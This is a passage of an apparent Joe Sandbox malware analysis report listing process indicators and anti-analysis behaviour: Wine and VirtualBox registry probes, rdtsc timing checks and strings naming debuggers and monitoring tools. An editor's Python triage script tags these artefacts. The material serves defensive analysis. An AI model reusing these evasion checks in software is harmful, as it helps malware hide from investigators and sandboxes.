                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX
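
The export above emits one line per intercepted call, so a single process error-mode change shows up as dozens of identical powershell.exe entries. NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX error-mode flag (it suppresses the "file not found" message box) and is set routinely by legitimate software, so on its own it is a low-signal indicator; the registry probes for Software\Wine and HARDWARE\ACPI\DSDT\VBOX__, the FirmwareTableInformation query, the PEB-based decision chain and the rdtsc pairs listed under Malware Analysis System Evasion further down are the entries a responder should weigh. The Python script that follows is an added triage example written for this page; it is not part of the Joe Sandbox report or of Joe Sandbox's tooling. It parses exported indicator lines in the fused "Source: <path><Indicator>: <detail>" form seen here, collapses verbatim repeats into counts and tags the anti-VM and anti-analysis artefacts per source process. The split rule between path and indicator name, the stripping of glued link text, and the tag mapping are the editor's assumptions derived from the lines on this page; the sample input is copied from this report.

```python
"""Triage helper for exported Joe Sandbox behaviour indicators.

Added example, not part of the report or of Joe Sandbox's tooling: it parses
the fused "Source: <path><Indicator>: <detail>" lines seen on this page,
collapses verbatim repeats into counts and tags anti-analysis artefacts.
"""
import re
from collections import Counter, defaultdict

# Assumption about the export format, derived from the lines on this page: the
# source (process path or memory-dump id) ends in .exe/.dll/.sdmp and is fused
# directly to an indicator name that starts with a capital letter and ends at
# the first colon.  This is not a documented Joe Sandbox format.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?\.(?:exe|dll|sdmp))"
    r"(?P<indicator>[A-Z][^:]*?):\s*(?P<detail>.*?)\s*$"
)
# Link text that the export glues onto the end of the detail column.
RESIDUE_RE = re.compile(r"(Jump to behavior|graph_\d+-\d+)$")

# Editor-supplied mapping from (upper-cased) substrings to evasion tags; it
# covers the artefacts visible in this report and is meant to be extended.
EVASION_TAGS = {
    r"SOFTWARE\WINE": "vm:wine",                  # HKCU\Software\Wine probe
    r"ACPI\DSDT\VBOX__": "vm:virtualbox",         # VirtualBox ACPI table key
    "FIRMWARETABLEINFORMATION": "vm:firmware-table-query",
    "GETPEB": "sandbox:peb-check",
    "RDTSC": "sandbox:rdtsc-timing",
}
# Analysis-tool names the samples carry as strings for process/module checks.
ANALYSIS_TOOLS = ("PROCMON.EXE", "X64DBG.EXE", "WINDBG.EXE", "WIRESHARK.EXE",
                  "IDA.EXE", "SBIEDLL.DLL", "SNXHK.DLL", "VMCHECK.DLL")

# Constructed input: lines copied from this report, with the powershell.exe
# line repeated three times to stand in for the dozens of repeats in the export.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX",
] * 3 + [
    r"Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeProcess information set: NOOPENFILEERRORBOX",
    "Malware Analysis System Evasion",  # section heading, not an indicator
    r"Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12315",
    r"Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSystem information queried: FirmwareTableInformation",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior",
    "Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2386FB second address: 2386FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
]


def parse_indicator(line):
    """Split one fused line into source, indicator and cleaned detail.

    Returns None for non-indicator lines.  A trailing graph reference is kept
    in "ref"; plain "Jump to behavior" link text is dropped.
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    detail, ref = m["detail"], None
    r = RESIDUE_RE.search(detail)
    if r:
        if r.group(1).startswith("graph_"):
            ref = r.group(1)
        detail = detail[: r.start()].rstrip()
    return {"source": m["source"], "indicator": m["indicator"],
            "detail": detail, "ref": ref}


def tag_evasion(indicator, detail):
    """Return the sorted list of evasion tags an indicator matches."""
    haystack = f"{indicator} {detail}".upper()
    tags = {tag for needle, tag in EVASION_TAGS.items() if needle in haystack}
    tools = sorted(t for t in ANALYSIS_TOOLS if t in haystack)
    if tools:
        tags.add("analysis-tools:" + ",".join(tools))
    return sorted(tags)


def triage(lines):
    """Collapse verbatim repeats into counts and collect tags per source.

    Sources with no evasion tags (the NOOPENFILEERRORBOX-only entries) are
    left out of the returned tag map.
    """
    counts = Counter()
    tags_by_source = defaultdict(set)
    for line in lines:
        rec = parse_indicator(line)
        if rec is None:
            continue
        counts[(rec["source"], rec["indicator"], rec["detail"])] += 1
        tags_by_source[rec["source"]].update(
            tag_evasion(rec["indicator"], rec["detail"]))
    return counts, {s: sorted(t) for s, t in tags_by_source.items() if t}


if __name__ == "__main__":
    counts, tags = triage(SAMPLE_LINES)
    for (src, ind, det), n in counts.most_common():
        name = src.rsplit("\\", 1)[-1]
        print(f"{n:3d}x  {name:<22} {ind}: {det[:60]}")
    for src, t in tags.items():
        print(f"{src} -> {', '.join(t)}")
```

Run against a full export (one indicator per line) the count column makes the repeated error-mode calls collapse into a single row, while the tag map lists only the processes that probed for Wine, VirtualBox, firmware tables, the PEB or analysis tools, which is the view a responder wants before reading the raw list.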

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12315
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9688
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000000.2720734859.000000000041F000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2390CC second address: 2390E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FD7ED120772h 0x0000000c jne 00007FD7ED120766h 0x00000012 jnc 00007FD7ED120766h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2390E4 second address: 239105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FD7ECCCADE6h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 224CB6 second address: 224CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Eh 0x00000007 jmp 00007FD7ED12076Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FD7ED120772h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23846B second address: 23847F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ECCCADE6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnp 00007FD7ECCCADE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2386FB second address: 2386FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2386FF second address: 238705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 238705 second address: 23871A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7ED12076Dh 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23BFFD second address: 23C003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C1AC second address: 23C1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 23C226 second address: 23C2E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FD7ECCCADE6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FD7ECCCADF1h 0x00000018 jnc 00007FD7ECCCADECh 0x0000001e popad 0x0000001f nop 0x00000020 mov dx, bx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FD7ECCCADE8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov edi, ecx 0x00000041 jnp 00007FD7ECCCADECh 0x00000047 and ecx, 2EDD0C5Ch 0x0000004d push 62178771h 0x00000052 jmp 00007FD7ECCCADF6h 0x00000057 xor dword ptr [esp], 621787F1h 0x0000005e sbb esi, 7130394Fh 0x00000064 push 00000003h 0x00000066 mov dword ptr [ebp+122D279Ah], esi 0x0000006c push 00000000h 0x0000006e adc esi, 585245A3h 0x00000074 push 00000003h 0x00000076 sbb si, FBB8h 0x0000007b push AA3632BCh 0x00000080 pushad 0x00000081 pushad 0x00000082 jmp 00007FD7ECCCADF4h 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24D68B second address: 24D691 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24D691 second address: 24D6A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD7ECCCADE6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jc 00007FD7ECCCADEEh 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A2B1 second address: 25A2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A419 second address: 25A42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADEBh 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A74C second address: 25A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25A750 second address: 25A75E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25AA29 second address: 25AA39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jno 00007FD7ED120766h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25AA39 second address: 25AA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25AB7B second address: 25AB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ED120766h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25AB8C second address: 25AB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25AB90 second address: 25ABB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25ABB1 second address: 25ABB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25ABB7 second address: 25ABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25ABBD second address: 25ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B010 second address: 25B01E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B01E second address: 25B022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B022 second address: 25B028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B152 second address: 25B175 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FD7ECCCADE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD7ECCCADF7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B2F4 second address: 25B309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jg 00007FD7ED12076Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B453 second address: 25B459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25191F second address: 251934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B5B8 second address: 25B5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25B5C5 second address: 25B605 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ED120775h 0x00000008 jmp 00007FD7ED12076Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007FD7ED12077Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FD7ED120766h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25BBFD second address: 25BC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 25C064 second address: 25C071 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
